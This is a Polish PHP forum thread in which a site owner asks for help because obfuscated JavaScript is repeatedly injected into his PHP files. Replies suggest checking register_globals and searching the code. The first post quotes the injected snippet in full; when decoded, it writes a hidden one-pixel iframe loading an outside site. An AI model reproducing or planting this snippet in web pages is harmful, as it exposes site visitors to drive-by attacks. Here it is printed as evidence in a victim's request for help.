Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Dopisywanie złośliwego kodu javascript
rafalp
post
Post #1





Grupa: Zarejestrowani
Postów: 224
Pomógł: 18
Dołączył: 4.02.2003
Skąd: Częstochowa

Ostrzeżenie: (0%)
-----


Mam nawracający problem z dopisywaniem do moich plików php w katalogu głównym serwera (w tym index.php) kodu:

  1. <?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>


Powoduje to zawieszenie przeglądarek. Po pierwszym incydencie zmieniłem hasła dostępowe do FTP jednak problem nie znika, czy ktoś spodkał się z czym podobnym? Co jeszcze można zrobić gdy serwer mam nie na swojej maszynie?

Ten post edytował rafalp 19.09.2008, 09:23:01


--------------------
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi (1 - 2)
Black-Berry
post
Post #2





Grupa: Zarejestrowani
Postów: 663
Pomógł: 6
Dołączył: 3.06.2007
Skąd: Kraków

Ostrzeżenie: (0%)
-----


phpinfo(). Zobacz jakie masz ustawienie register_globals. Też się z tym spotkałem. Pasowałoby też przeszukać cały kod bo możliwe ze złosliwy kod generujący ten dopisek już się gdzies wstrzyknął.

Odpisz czy udało Ci się rozwiązać proble. Tez z tym chcę powalczyć u siebie.

Ten post edytował Black-Berry 19.09.2008, 11:30:55


--------------------
Go to the top of the page
+Quote Post
kwiateusz
post
Post #3


Admin Techniczny


Grupa: Administratorzy
Postów: 2 071
Pomógł: 93
Dołączył: 5.07.2005
Skąd: Olsztyn




Przenosze bo to nie ma zwiazku z serwerem WWW tylko pewnie z aplikacja
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 19.08.2025 - 17:18